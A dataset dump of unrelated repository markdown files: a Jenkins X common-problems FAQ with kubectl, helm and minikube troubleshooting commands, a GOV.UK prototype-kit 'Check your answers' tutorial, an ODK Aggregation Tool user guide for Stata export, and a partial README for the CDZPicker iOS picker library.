] | null | null | null | ---
date: '2020-10-01'
cover: './images/javascript-profesional.png'
title: 'Curso Profesional de JavaScript'
github: 'https://github.com/silnose/javascript-profesional'
external: 'https://platzi.com/courses/javascript-profesional/'
---
| 29.5 | 62 | 0.754237 | ron_Latn | 0.104828 |
edf60be2410537a29a53992b730978847190df93 | 19,723 | md | Markdown | content/en/docs/faq/issues.md | vfarcic/jx-docs-1 | 49b59fd26c83c6a44b6676f096195cbcc2557664 | [
"Apache-2.0"
] | null | null | null | content/en/docs/faq/issues.md | vfarcic/jx-docs-1 | 49b59fd26c83c6a44b6676f096195cbcc2557664 | [
"Apache-2.0"
] | null | null | null | content/en/docs/faq/issues.md | vfarcic/jx-docs-1 | 49b59fd26c83c6a44b6676f096195cbcc2557664 | [
"Apache-2.0"
] | null | null | null | ---
title: Common Problems
linktitle: Common Problems
description: Questions on common issues setting up Jenkins X.
weight: 50
aliases:
- /faq/issues/
---
We have tried to collate common issues here with work arounds. If your issue isn't listed here please [let us know](https://github.com/jenkins-x/jx/issues/new).
## Jenkins X does not startup
If your install fails to start there could be a few different reasons why the Jenkins X pods don't start.
Your cluster could be out of resources. You can check the spare resources on your cluster via [jx status](/commands/jx_status/):
```sh
jx status
```
We also have a diagnostic command that looks for common problems [jx step verify install](/commands/jx_step_verify_install/):
```sh
jx step verify install
```
A common issue for pods not starting is if your cluster does not have a [default storage class](https://kubernetes.io/docs/concepts/storage/storage-classes/) setup so that `Persistent Volume Claims` can be bound to `Persistent Volumes` as described in the [install instructions](/docs/getting-started/install-on-cluster/).
You can check your storage class and persistent volume setup via:
```sh
kubectl get pvc
```
If things are working you should see something like:
```sh
$ kubectl get pvc
NAME STATUS VOLUME CAPACITY ACCESS MODES STORAGECLASS AGE
jenkins Bound pvc-680b39b5-94f1-11e8-b93d-42010a840238 30Gi RWO standard 12h
jenkins-x-chartmuseum Bound pvc-6808fb5e-94f1-11e8-b93d-42010a840238 8Gi RWO standard 12h
jenkins-x-docker-registry Bound pvc-680a415c-94f1-11e8-b93d-42010a840238 100Gi RWO standard 12h
jenkins-x-mongodb Bound pvc-680d6fd9-94f1-11e8-b93d-42010a840238 8Gi RWO standard 12h
jenkins-x-nexus Bound pvc-680fc692-94f1-11e8-b93d-42010a840238 8Gi RWO standard 12h
```
If you see `status` of `Pending` then this indicates that you have no [default storage class](https://kubernetes.io/docs/concepts/storage/storage-classes/) setup on your kubnernetes cluster or you have ran out of persistent volume space.
Please try create a [default storage class](https://kubernetes.io/docs/concepts/storage/storage-classes/) for your cluster or contact your operations team or cloud provider.
If the `Persistent Volume Claims` are all `Bound` and things still have not started then try
```sh
kubectl get pod
```
If a pod cannot start try
```sh
kubectl describe pod some-pod-name
```
Maybe that gives you a clue. Is it RBAC related maybe?
If you are still stuck try [create an issue](https://github.com/jenkins-x/jx/issues/new)
## http: server gave HTTP response to HTTPS client
If your pipeline fails with something like this:
```sh
The push refers to a repository [100.71.203.90:5000/lgil3/jx-test-app]
time="2018-07-09T21:18:31Z" level=fatal msg="build step: pushing [100.71.203.90:5000/lgil3/jx-test-app:0.0.2]: Get https://100.71.203.90:5000/v1/_ping: http: server gave HTTP response to HTTPS client"
```
Then this means that you are using the internal docker registry inside Jenkins X for your images but your kubernetes cluster's docker daemons has not been configured for `insecure-registries` so that you can use `http` to talk to the docker registry service `jenkins-x-docker-registry` in your cluster.
By default docker wants all docker registries to be exposed over `https` and to use TLS and certificates. This should be done for all public docker registries. However when using Jenkins X with an internal local docker registry this is hard since its not available at a public DNS name and doesn't have HTTPS or certificates; so we default to requiring `insecure-registry` be configured on all the docker daemons for your kubernetes worker nodes.
We try to automate this setting when using `jx create cluster` e.g. on AWS we default this value to the IP range `100.64.0.0/10` to match most kubernetes service IP addresses.
On [EKS](/commands/jx_create_cluster_eks/) we default to using ECR to avoid this issue. Similarly we will soon default to GCR and ACR on GKE and AKS respectively.
So a workaround is to use a real [external docker registry](/docs/guides/managing-jx/common-tasks/docker-registry/) or enable `insecure-registry` on your docker daemons on your compute nodes on your Kubernetes cluster.
## Helm fails with Error: UPGRADE FAILED: incompatible versions client[...] server[...]'
Generally speaking this happens when your laptop has a different version of helm to the version used in our build pack docker images and/or the version of tiller thats running in your server.
The simplest fix for this is to just [not use tiller at all](/blog/2018/10/03/helm-without-tiller/) - which actually helps avoid this problem ever happening and solves a raft of security issues too.
However switching from using Tiller to No Tiller does require a re-install of Jenkins X (though you could try do that in separate set of namespaces then move projects across incrementally?).
The manual workaround is to install the [exact same version of helm as used on the server](https://github.com/helm/helm/releases)
Or you can try switch tiller to match your client version:
* run `helm init --upgrade`
Though as soon as a pipeline runs it'll switch the tiller version again so you'll have to keep repeating the above.
## error creating jenkins credential jenkins-x-chartmuseum 500 Server Error
This is a [pending issue](https://github.com/jenkins-x/jx/issues/1234) which we will hopefully fix soon.
It basically happens if you have an old API token in `~/.jx/jenkinsAuth.yaml` for your jenkins server URL. You can either:
* remove it from that file by hand
* run the following command [jx delete jenkins token](/commands/deprecation/):
jx delete jenkins token admin
## errors with chartmuseum.build.cd.jenkins-x.io
If you see errors like:
```sh
error:failed to add the repository 'jenkins-x' with URL 'https://chartmuseum.build.cd.jenkins-x.io'
```
or
```sh
Looks like "https://chartmuseum.build.cd.jenkins-x.io" is not a valid chart repository or cannot be reached
```
then it looks like you have a reference to an old chart museum URL for Jenkins X charts.
The new URL is: http://chartmuseum.jenkins-x.io
It could be your helm install has an old repository URL installed. You should see...
```sh
$ helm repo list
NAME URL
stable https://kubernetes-charts.storage.googleapis.com
jenkins-x http://chartmuseum.jenkins-x.io
```
If you see this...
```sh
$ helm repo list
NAME URL
jenkins-x https://chartmuseum.build.cd.jenkins-x.io
```
then please run...
```sh
helm repo remove jenkins-x
helm repo add jenkins-x http://chartmuseum.jenkins-x.io
```
and you should be good to go again.
Another possible cause is an old URL in your environment's git repository may have old references to the URL.
So open your `env/requirements.yaml` in your staging/production git repositories and modify them to use the URL http://chartmuseum.jenkins-x.io instead of **chartmuseum.build.cd.jenkins-x.io** like this [env/requirements file](https://github.com/jenkins-x/default-environment-charts/blob/master/env/requirements.yaml)
## git errors: POST 401 Bad credentials
This indicates your git API token either was input incorrectly or has been regenerated and is now incorrect.
To recreate it with a new API token value try the following (changing the git server name to match your git provider):
```sh
jx delete git token -n github <yourUserName>
jx create git token -n github <yourUserName>
```
More details on [using git and Jenkins X here](/docs/guides/managing-jx/common-tasks/git/)
## Invalid git token to scan a project
If you get an error in Jenkins when it tries to scan your repositories for branches something like:
```sh
hudson.AbortException: Invalid scan credentials *****/****** (API Token for acccessing https://github.com git service inside pipelines) to connect to https://api.github.com, skipping
```
Then your git API token was probably wrong or has expired.
To recreate it with a new API token value try the following (changing the git server name to match your git provider):
```sh
jx delete git token -n GitHub admin
jx create git token -n GitHub admin
```
More details on [using git and Jenkins X here](/docs/guides/managing-jx/common-tasks/git/)
## What are the credentials to access core services?
Authenticated core services of Jenkins X include Jenkins, Nexus, ChartMuseum. The default username is `admin`and the password by default is generated and printed out in the terminal after `jx create cluster` or `jx install`.
### Set Admin Username and Password values for Core Services
You can also set the admin username via the `--default-admin-username=username` flag.
{{< alert >}}
Perhaps you are using the Active Directory security realm in Jenkins. It is in this scenario that setting the Admin Username via the `--default-admin-username` based on your existing service accounts makes sense.
You may also pass this value via the `myvalues.yaml`.
{{< /alert >}}
If you would like to set the default password yourself then you can set the flag `--default-admin-password=foo` to the two comamnds above.
If you don't have the terminal console output anymore you can look in the local file `~/.jx/jenkinsAuth.yaml` and find the password that matches your Jenkins server URL for the desired cluster.
## Persistent Volume Claims do not bind
If you notice that the persistent volume claims created when installing Jenkins X don't bind with
kubectl get pvc
The you should check that you have a cluster default storage class for dynamic persistent volume provisioning. See [here](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/) for more details.
## I cannot connect to nodes on AWS
If you don't see any valid nodes returned by `kubectl get node` or you get errors running `jx status` something like:
```sh
Unable to connect to the server: dial tcp: lookup abc.def.regino.eks.amazonaws.com on 10.0.0.2:53: no such host
```
it could be your kube config is stale. Try
```sh
aws eks --region <CLUSTER_REGION> update-kubeconfig --name <CLUSTER_NAME>
```
That should regenerate your local `~/kube/config` file and so `kubectl get node` or `jx status` should find your nodes
## How can I diagnose exposecontroller issues?
When you promote a new version of your application to an environment, such as the Staging Environment a Pull Request is raised on the environment repository.
When the master pipeline runs on an environment a Kubernetes `Job` is created for [exposecontroller](https://github.com/jenkins-x/exposecontroller) which runs a pod until it terminates.
It can be tricky finding the log for temporary jobs since the pod is removed.
One way to diagnose logs in your, say, Staging environment is to [download and install kail](https://github.com/boz/kail) and add it to your `PATH`.
Then run this command:
```sh
kail -l job-name=expose -n jx-staging
```
If you then promote to the Staging environment or retrigger the pipeline on the `master` branch of your Staging git repository (e.g. via [jx start pipeline](/commands/jx_start_pipeline/)) then you should see the output of the [exposecontroller](https://github.com/jenkins-x/exposecontroller) pod.
## Why is promotion really slow?
If you find you get lots of warnings in your pipelines like this...
```sh
"Failed to query the Pull Request last commit status for https://github.com/myorg/environment-mycluster-staging/pull/1 ref xyz Could not find a status for repository myorg/environment-mycluster-staging with ref xyz
```
and promotion takes 30 minutes from a release pipeline on an application starting to the change hitting `Staging` then its mostly probably due to Webhooks.
When we [import projects](/docs/guides/using-jx/creating/import/) or [create quickstarts](/docs/getting-started/first-project/create-quickstart/) we automate the setup of CI/CD pipelines for the git repository. What this does is setup Webhooks on the git repository to trigger Jenkins X to trigger pipelines (either using Prow for [serverless Jenkins X Pipelines](/about/concepts/jenkins-x-pipelines/) or the static jenkins server if not).
However sometimes your git provider (e.g. [GitHub](https://github.com/) may not be able to do connect to your Jenkins X installation (e.g. due to networking / firewall issues).
The easiest way to diagnose this is opening the git repository (e.g. for your environment repository).
```sh
jx get env
```
Then:
* click on the generated URL for, say, your `Staging` git repository
* click the `Settings` icon
* select the `Webhooks` tab on the left
* select your Jenkins X webhook URL
* view the last webhook - did it succeed? Try re-trigger it? That should highlight any network issues etc
If you cannot use public webhooks you could look at something like [ultrahook](http://www.ultrahook.com/)
## Cannot create cluster minikube
If you are using a Mac then `hyperkit` is the best VM driver to use - but does require you to install a recent [Docker for Mac](https://docs.docker.com/docker-for-mac/install/) first. Maybe try that then retry `jx create cluster minikube`?
If your minikube is failing to startup then you could try:
```sh
minikube delete
rm -rf ~/.minikube
```
If the `rm` fails you may need to do:
```sh
sudo rm -rf ~/.minikube
```
Now try `jx create cluster minikube` again - did that help? Sometimes there are stale certs or files hanging around from old installations of minikube that can break things.
Sometimes a reboot can help in cases where virtualisation goes wrong ;)
Otherwise you could try follow the minikube instructions
* [install minikube](https://github.com/kubernetes/minikube#installation)
* [run minikube start](https://github.com/kubernetes/minikube#quickstart)
## Minkube and hyperkit: Could not find an IP address
If you are using minikube on a mac with hyperkit and find minikube fails to start with a log like:
```sh
Temporary Error: Could not find an IP address for 46:0:41:86:41:6e
Temporary Error: Could not find an IP address for 46:0:41:86:41:6e
Temporary Error: Could not find an IP address for 46:0:41:86:41:6e
Temporary Error: Could not find an IP address for 46:0:41:86:41:6e
```
It could be you have hit [this issue in minikube and hyperkit](https://github.com/kubernetes/minikube/issues/1926#issuecomment-356378525).
The work around is to try the following:
```sh
rm ~/.minikube/machines/minikube/hyperkit.pid
```
Then try again. Hopefully this time it will work!
## Cannot access services on minikube
When running minikube locally `jx` defaults to using [nip.io](http://nip.io/) as a way of using nice-isn DNS names for services and working around the fact that most laptops can't do wildcard DNS. However sometimes [nip.io](http://nip.io/) has issues and does not work.
To avoid using [nip.io](http://nip.io/) you can do the following:
Edit the file `~/.jx/cloud-environments/env-minikube/myvalues.yaml` and add the following content:
```yaml
expose:
Args:
- --exposer
- NodePort
- --http
- "true"
```
Then re-run `jx install` and this will switch the services to be exposed on `node ports` instead of using ingress and DNS.
So if you type:
```sh
jx open
```
You'll see all the URs of the form `http://$(minikube ip):somePortNumber` which then avoids going through [nip.io](http://nip.io/) - it just means the URLs are a little more cryptic using magic port numbers rather than simple host names.
## How do I get the Password and Username for Jenkins?
Install [KSD](https://github.com/mfuentesg/ksd) by running `go get github.com/mfuentesg/ksd` and then run `kubectl get secret jenkins -o yaml | ksd`
## How do I see the log of exposecontroller?
Usually we run the [exposecontroller]() as a post install `Job` when we perform promotion to `Staging` or `Production` to expose services over Ingress and possibly inject external URLs into applications configuration.
So the `Job` will trigger a short lived `Pod` to run in the namespace of your environment, then the pod will be deleted.
If you want to view the logs of the `exposecontroller` you will need to watch for the logs using a selector then trigger the promotion pipeline to capture it.
One way to do that is via the [kail](https://github.com/boz/kail) CLI:
```sh
kail -l job-name=expose
```
This will watch for exposecontroller logs and then dump them to the console. Now trigger a promotion pipeline and you should see the output within a minute or so.
## Cannot create TLS certificates during Ingress setup
> [cert-manager](https://docs.cert-manager.io/en/latest/index.html) is a separate project from _Jenkins X_.
Newly created GKE clusters or existing clusters running _kubernetes_ **v1.12** or older will encounter the following error when configuring Ingress with site-wide TLS:
```sh
Waiting for TLS certificates to be issued...
Timeout reached while waiting for TLS certificates to be ready
```
This issue is caused by the _cert-manager_ namespace not having the `disable-validation` label set, a known cert-manager issue that is [documented on their website](https://docs.cert-manager.io/en/latest/getting-started/install/kubernetes.html). The following steps, taken from the [cert-manager/troubleshooting-installation](https://docs.cert-manager.io/en/latest/getting-started/troubleshooting.html#troubleshooting-installation) webpage, should resolve the issue:
Check if the _disable-validation_ label exists on the _cert-manager_ namespace.
```sh
kubectl describe namespace cert-manager
```
If you cannot see the `certmanager.k8s.io/disable-validation=true` label on your namespace, you should add it with:
```sh
kubectl label namespace cert-manager certmanager.k8s.io/disable-validation=true
```
Confirm the label has been added to the _cert-manager_ namespace.
```sh
kubectl describe namespace cert-manager
Name: cert-manager
Labels: certmanager.k8s.io/disable-validation=true
Annotations: <none>
Status: Active
...
```
Now rerun _jx_ Ingress setup:
```sh
jx upgrade ingress
```
While the ingress command is running, you can tail the _cert-manager_ logs in another terminal and see what is happening. You will need to find the name of your _cert-manager_ pod using:
```sh
kubectl get pods --namespace cert-manager
```
Then tail the logs of the _cert-manager_ pod.
```sh
kubectl logs YOUR_CERT_MNG_POD --namespace cert-manager -f
```
Your TLS certificates should now be set up and working; otherwise check out the [official _cert-manager_ troubleshooting](https://docs.cert-manager.io/en/latest/getting-started/troubleshooting.html) instructions.
## Recreating a cluster with the same name
If you want to destroy a cluster that was created with boot and recreate it with the exact same name, there is some cleanup that needs to be done first.
Make sure you uninstall jx:
```sh
jx uninstall
```
Delete the cluster either from the web console or terminal by using the Kubernetes provider CLI command:
```sh
gcloud container clusters delete <cluster-name> --zone <cluster-zone>
```
After you have successfully done this, remove the `~/.jx` and `~/.kube` directories:
```sh
rm -rf ~/.jx ~/.kube
```
Delete any repositories created by `jx` on your GitHub organisation's account.
Delete the local git `jenkins-x-boot-config` repository.
That should leave your Kubernetes provider and your local environment in a clean state.
## Other issues
Please [let us know](https://github.com/jenkins-x/jx/issues/new) and we'll see if we can help. Good luck!
# Show the user's answers on your 'Check your answers' page
If you do research with real user data, you must clear a user's data before each session by either:
- closing all browser windows and [opening a new incognito window](https://support.google.com/chrome/answer/95464)
- selecting the **Clear data** link at the bottom of the prototype
Check you’ve cleared the data by returning to a previously-loaded page and making sure the data is gone.
## Showing data
To display user data on a different page, use this [Nunjucks](https://mozilla.github.io/nunjucks/) code:
```
{{ data['INPUT-ATTRIBUTE-NAME'] }}
```
Change `INPUT-ATTRIBUTE-NAME` to the value you used in the [`name` attribute on the question page](/docs/make-first-prototype/add-questions#add-a-text-input-to-question-2). For example:
```
{{ data['how-many-balls'] }}
```
### Show the answer to question 1
1. Open the `check-your-answers.html` file in your `app/views` folder.
2. Find the `<dt>` tag that contains the text `Name`.
3. Change `Name` to `Number of balls you can juggle`.
4. In the `<dd>` tag on the next line, change `Sarah Philips` to `{{ data['how-many-balls'] }}`.
You must also change `<span class="govuk-visually-hidden"> name</span>` to `<span class="govuk-visually-hidden"> number of balls you can juggle</span>`.
Screen readers will read the text in the `<span>` tags, but the text will not appear on the page.
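After these edits, the summary-list row for question 1 should look roughly like this (a sketch assuming the GOV.UK Design System's standard summary-list markup; the change link's `href` is illustrative):

```html
<div class="govuk-summary-list__row">
  <dt class="govuk-summary-list__key">
    Number of balls you can juggle
  </dt>
  <dd class="govuk-summary-list__value">
    {{ data['how-many-balls'] }}
  </dd>
  <dd class="govuk-summary-list__actions">
    <a href="#">
      Change<span class="govuk-visually-hidden"> number of balls you can juggle</span>
    </a>
  </dd>
</div>
```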
### Show the answer to question 2
1. Find the `<dt>` tag that contains the text `Date of birth`.
2. Change `Date of birth` to `Your most impressive juggling trick`.
3. In the `<dd>` tag on the next line, change `5 January 1978` to `{{ data['most-impressive-trick'] }}`.
You must also change `<span class="govuk-visually-hidden"> date of birth</span>` to `<span class="govuk-visually-hidden"> your most impressive juggling trick</span>`.
Go to http://localhost:3000/start and answer the questions to check the answer to question 2 works.
### Delete the remaining example answers
There are example answers on the ‘Check your answers’ template page that you do not need. You can delete these example answers from the `check-your-answers.html` file.
1. Find and delete the section that starts with `<div class="govuk-summary-list__row">` and contains `Contact information`.
2. Find and delete the section that starts with `<div class="govuk-summary-list__row">` and contains `Contact details`.
3. Delete everything from the line that contains `Application details` down to the line that contains `Now send your application`.
# site-de-dodo
Dodo's portfolio.
# User Guide
## Contents
- [Introduction](#introduction)
- [Purpose](#purpose)
- [Interface](#interface)
- [Behaviour Notes](#behaviour-notes)
- [Messages](#messages)
# Introduction
This document describes how to use the ODK Aggregation Tool (OAT), and provides information on the types of errors that can occur and how to resolve them.
# Purpose
The purpose of the OAT is to enable the preparation of ODK Collect data for analysis in Stata.
The OAT reads the instance XML files produced by ODK Collect, and the XLSForms used to prepare the XForms, and produces a Stata XML file. The Stata XML file includes all the instance XML data, with metadata such as variable labels, types, formats and value labels. One Stata XML file is produced per XLSForm definition (including all versions).
Since the OAT is a thin wrapper around modules that do the work, the underlying code could either be included in other libraries or extended to support other export formats. Similarly, Stata has a command line control facility for automating analysis or conversion procedures.
# Interface
The user interface presents 3 text boxes for selecting the following inputs:
- "XLSForm definitions path": the folder containing the XLSForm XLSX files to read. This folder should contain at least one XLSForm, but ideally contains a copy of all versions of the XLSForm that were used to collect data.
- "XForm data path": the folder containing the XForm instance XML files to read. This folder should contain at least one XML file.
- "Output path": the folder to save the Stata XML file(s). Additionally, if a large amount of log messages are produced during processing, a "log.txt" file will be saved in this location with a copy of the messages.
The above paths can be either:
- Selected by clicking the corresponding "Browse..." button to the left of the text box
- Copying and pasting in the path
- Typing in the path
Once these inputs have been entered, click the "Run" button to execute the aggregation task. When the task is initiated, a message will be written to the "Last run output" textbox to confirm that the task has started. Any further messages, for example informational or error messages, will be written to the same output textbox. More detail on these messages is included in the below section: "Messages".
Each Stata XML file can be read into Stata using the following command:
```stata
xmluse "//path/to/stata/xml/file.xml", doctype(dta)
```
Stata can then be used to analyse the data, or export it to a wide variety of formats.
# Behaviour Notes
If the amount and/or size of XML files being processed is very large, the OAT may become unresponsive while processing is happening in the background. Once a result has been reached, the output messages will be displayed.
Where multiple versions of a XLSForm have been read, the definitions will be sorted (numerically or alphabetically), and the most recent definition for each variable will be used in the output. For example, in version 1, an item might say "What colour do you like?" and version 2 updated the item to say "What colour do you REALLY like?" - in this case, the version 2 definition is used. This also allows metadata for items that appeared in version 1 but not version 2 to still be included in the output.
If the XForm files include duplicates, the first discovered copy (highest in directory tree / alphabetically) will be used in the output. A message will be shown to indicate which files are duplicates and which one was used. The determination of a "duplicate" is based on the XML file content being exactly the same between one or more files.
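The duplicate rule above amounts to grouping files by their exact byte content. A minimal Python sketch of the idea (illustrative, not the tool's actual code):

```python
import hashlib

def group_duplicates(xml_blobs):
    """Group file paths by the SHA-256 digest of their exact content.

    xml_blobs: dict mapping path -> bytes content.
    Returns a dict mapping digest -> sorted list of paths; within each
    group, the first listed path is the copy that would be used.
    """
    groups = {}
    for path in sorted(xml_blobs):  # alphabetical order = "first discovered"
        digest = hashlib.sha256(xml_blobs[path]).hexdigest()
        groups.setdefault(digest, []).append(path)
    return groups
```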
Additional notes about output content:
- XML elements read from instance XML files that don't have any matching XLSForm definition will be included as a text variable.
- XML attributes other than the form_id "@id" and form version "@version" will not be included in the output.
- Currently, only the following mappings for XLSForm variable types to Stata data types and formats are included: "start" (str26, %26s), "end" (str26, %26s), "deviceid" (str17, %17s), "date" (int, %td), "text" (str2045, %30s), and "integer" (int, %10.0g)
- Date variables are converted to the Stata Internal Format (SIF) which is an integer representing the number of days (positive or negative) between the specified date, and the Stata zero date of "1960-01-01".
- Metadata is read from the following XLSForm locations for Stata purposes, each is assumed to have content that is valid for each use in Stata (e.g. contains valid characters):
- "name": used for the Stata variable name
- "type": used to determine Stata data type and format, per the above mappings.
- "label": used for variable labels. If a (non-standard) column named "name_description" is included, this is used in preference to the label column.
- "choices" sheet: used for value label definitions
# Messages
The following types of messages may be shown, and are listed in approximately the order that they might be expected to be encountered.
Error messages are indicated by "ERROR" - in general these problems must be resolved. Informational messages are indicated by "INFO" - these indicate the performance of normal behaviour and may be used to help understand the nature of the output.
- ERROR: "*input* is empty ...": the named input textbox requires a value but it is currently empty.
- ERROR: "*input* does not correspond to an existing directory": the named input textbox has a value which doesn't correspond to a directory that exists, or is accessible.
- ERROR: " ... while trying to read the XLSX file at the following path ...": the named XLSX file could not be read. It may be open (e.g. "Permission denied" error), or an invalid file (e.g. "Corrupt file" error). Try to collect the known good, valid XLSForms into a separate directory and use that instead.
- ERROR: "The required sheets for an XLSForm definition ... were not found": the input XLSForm directoy included XLSX files that did not contain the sheets required for a valid XLSForm definition - as above, try to collect the known good, valid XLSForms into a separate directory and use that instead.
- ERROR: "No XLSForms were read from the specified path": try to collect the known good, valid XLSForms into a separate directory and use that instead.
- INFO: "The following XLSForm form_ids were read": these XLSForm definitions will be processed.
- INFO: "Reading XLSForms for form_id *id*, sorted by version in order of *versions*": the metadata is being preferentially read from the XLSForm versions in the stated order. If there are missing versions, try to collect the known good, valid XLSForms into a separate directory and use that instead.
- INFO: "Removed XML attributes from parsed data ...": the only XML attributes included in the output are "@id" (form_id) and "@version" (form version). Any attributes listed in this message were removed.
- INFO: "Found duplicate XML files ...": the listed XML files appeared to be exact duplicates, and only the first listed will be included in the output. Check the named XML files and remove any genuine duplicates, or adjust the "XForm data path" input parameter to be more specific to a location without duplicates.
- INFO: "Data was read for the following variables, but there was no metadata for them in the XLSForms ...": the listed variables were found in the XML data but there wasn't any definitions available in the processed XLSForms. This will mean that output file will include the variable values as text, without any particular labelling. If there is a XLSForm definition specifying metadata for this variable, include it in the input path selected for "XLSForm definitions path".
- INFO: "Metadata added to form_id *id* for the following unknown variables ...": the listed variables were successfully added to the form definition for the purposes of further processing; all this means is that they will be included in the output for the current task run.
- INFO: "Removed variable metadata for the following fields assumed to be empty labelling variables (type=text and read_only=yes)": since the XLSForm and XML data includes elements for variables that are text and don't accept input, but are included for labelling purposes. These variables are removed from the output data as they contain no information.
- INFO: "Using default language: *lang*, for metadata with form_id *id*": in the XLSForms settings sheet, a default language is specified. If multiple languages are defined for the variable or value labels, this default language is used for the Stata XML output.
- INFO: "Found non-integer value in choice list: *name*, value: *value*. Variables using this choice list will not have labelling applied as Stata only allows labelling integer values.": the stated choice list included a value that could not be converted to an integer. Stata only allows value labelling of integer values, so values for variables that use that choice list will not have labelling applied..
- INFO: "Collected data for *count* observations for form_id: *id*": the stated number of observations were included in the output for the stated form_id. If this is less than expected, check that the input path for "XForm data path" is correct, and contains all relevant XML files.
- INFO: "Wrote form data for form_id: *id*, to a file at: *path*": the Stata XML file for the stated form id was written to the stated path.
| 106.325843 | 504 | 0.777238 | eng_Latn | 0.999745 |
edf7dd9479b2c03e1f4b230899ef519f411d26e6 | 103 | md | Markdown | README.md | Mearsu/Sietor | c3ac2b8bb6f52542845077650a06cd3519228769 | [
"Apache-2.0"
] | null | null | null | README.md | Mearsu/Sietor | c3ac2b8bb6f52542845077650a06cd3519228769 | [
"Apache-2.0"
] | null | null | null | README.md | Mearsu/Sietor | c3ac2b8bb6f52542845077650a06cd3519228769 | [
"Apache-2.0"
] | null | null | null | # Sietor
Sietor is my attempt at makinga text editor, it isn't finished, atm I'm working on rendering
| 25.75 | 92 | 0.76699 | eng_Latn | 0.997836 |
edf7deba7cb5838aacc75bf88bdf152f72d33a3b | 771 | md | Markdown | windows.system.remotesystems/remotesystemdiscoverytypefilter.md | stefb965/winrt-api | 89da6197d3c4c09e3bbb4966b984a6da790614f3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows.system.remotesystems/remotesystemdiscoverytypefilter.md | stefb965/winrt-api | 89da6197d3c4c09e3bbb4966b984a6da790614f3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows.system.remotesystems/remotesystemdiscoverytypefilter.md | stefb965/winrt-api | 89da6197d3c4c09e3bbb4966b984a6da790614f3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
-api-id: T:Windows.System.RemoteSystems.RemoteSystemDiscoveryTypeFilter
-api-type: winrt class
---
<!-- Class syntax.
public class RemoteSystemDiscoveryTypeFilter : Windows.System.RemoteSystems.IRemoteSystemDiscoveryTypeFilter, Windows.System.RemoteSystems.IRemoteSystemFilter
-->
# Windows.System.RemoteSystems.RemoteSystemDiscoveryTypeFilter
## -description
An [IRemoteSystemFilter](iremotesystemfilter.md) that limits the set of discoverable remote systems by allowing only those of a specific discovery type.
## -remarks
## -examples
## -see-also
[Connected apps and devices (Project "Rome")](https://msdn.microsoft.com/en-us/windows/uwp/launch-resume/connected-apps-and-devices), [IRemoteSystemFilter](iremotesystemfilter.md)
## -capabilities
remoteSystem | 33.521739 | 179 | 0.806744 | eng_Latn | 0.332365 |
edf96493f8c1fd43b9315ba99c128276e428e46c | 791 | md | Markdown | docs/modules/_src_entities_linkedin_job_posting_.md | phanluanint/linkedin-private-api | e629272fe527c2a76df973937b96752930df6b8a | [
"MIT"
] | 141 | 2020-10-09T17:53:07.000Z | 2022-03-23T00:41:23.000Z | docs/modules/_src_entities_linkedin_job_posting_.md | phanluanint/linkedin-private-api | e629272fe527c2a76df973937b96752930df6b8a | [
"MIT"
] | 206 | 2020-10-10T09:11:09.000Z | 2022-03-28T03:06:52.000Z | docs/modules/_src_entities_linkedin_job_posting_.md | phanluanint/linkedin-private-api | e629272fe527c2a76df973937b96752930df6b8a | [
"MIT"
] | 34 | 2020-10-11T19:46:47.000Z | 2022-02-18T08:24:32.000Z | **[linkedin-private-api](../README.md)**
> [Globals](../globals.md) / "src/entities/linkedin-job-posting"
# Module: "src/entities/linkedin-job-posting"
## Index
### Interfaces
- [LinkedInJobPosting](../interfaces/_src_entities_linkedin_job_posting_.linkedinjobposting.md)
- [LinkedInJobPostingCompany](../interfaces/_src_entities_linkedin_job_posting_.linkedinjobpostingcompany.md)
### Variables
- [JOB_POSTING_TYPE](_src_entities_linkedin_job_posting_.md#job_posting_type)
## Variables
### JOB_POSTING_TYPE
• `Const` **JOB_POSTING_TYPE**: \"com.linkedin.voyager.jobs.JobPosting\" = "com.linkedin.voyager.jobs.JobPosting"
_Defined in [src/entities/linkedin-job-posting.ts:1](https://github.com/eilonmore/linkedin-private-api/blob/84c9c15/src/entities/linkedin-job-posting.ts#L1)_
| 31.64 | 157 | 0.780025 | yue_Hant | 0.257154 |
edfa01b2c29819e0ae953ddb3eae00466132252b | 3,349 | md | Markdown | README.md | Nemocdz/CDZPicker | 6f66e51e1557acff5d0bc433ef6eeea42baf1b84 | [
"MIT"
] | 28 | 2017-05-31T07:52:43.000Z | 2021-04-28T14:16:16.000Z | README.md | Nemocdz/CDZPickerViewDemo | 6f66e51e1557acff5d0bc433ef6eeea42baf1b84 | [
"MIT"
] | null | null | null | README.md | Nemocdz/CDZPickerViewDemo | 6f66e51e1557acff5d0bc433ef6eeea42baf1b84 | [
"MIT"
] | 6 | 2017-09-16T00:44:08.000Z | 2021-07-18T08:46:51.000Z | # CDZPicker
This is a small Picker easy to use. The datas can be linkage.(For example country - city)
## Demo Preview

## Changelog
- Fix Frame when superView is not corret frame
- Add builder to custom the picker
- Return Selected Indexs
## Installation
### Manual
Add "CDZPicker" files to your project
### CocoaPods
Add ``pod 'CDZPicker'`` in your Podfile
## Usage
``#import "CDZPicker.h"``
- Single:
```objective-c
[CDZPicker showSinglePickerInView:self.view withBuilder:nil strings:@[@"objective-c",@"java",@"python",@"php"] confirm:^(NSArray<NSString *> * _Nonnull strings, NSArray<NSNumber *> * _Nonnull indexs) {
self.label.text = strings.firstObject;
}cancel:^{
//your code
}];
```
- Multiple & unlinked:
```objective-c
[CDZPicker showMultiPickerInView:self.view withBuilder:nil stringArrays:@[@[@"MacOS",@"Windows",@"Linux",@"Ubuntu"],@[@"Xcode",@"VSCode",@"Sublime",@"Atom"]] confirm:^(NSArray<NSString *> * _Nonnull strings, NSArray<NSNumber *> * _Nonnull indexs) {
self.label.text = [strings componentsJoinedByString:@"+"];
} cancel:^{
// your code
}];
```
- Multiple & linked:
First, configure the objects and their `subArray` properties.
```objective-c
CDZPickerComponentObject *haizhu = [[CDZPickerComponentObject alloc]initWithText:@"海珠区"];
CDZPickerComponentObject *yuexiu = [[CDZPickerComponentObject alloc]initWithText:@"越秀区"];
CDZPickerComponentObject *guangzhou = [[CDZPickerComponentObject alloc]initWithText:@"广州市"];
guangzhou.subArray = [NSMutableArray arrayWithObjects:haizhu,yuexiu, nil];
CDZPickerComponentObject *xiangqiao = [[CDZPickerComponentObject alloc]initWithText:@"湘桥区"];
CDZPickerComponentObject *chaozhou = [[CDZPickerComponentObject alloc]initWithText:@"潮州市"];
chaozhou.subArray = [NSMutableArray arrayWithObjects:xiangqiao, nil];
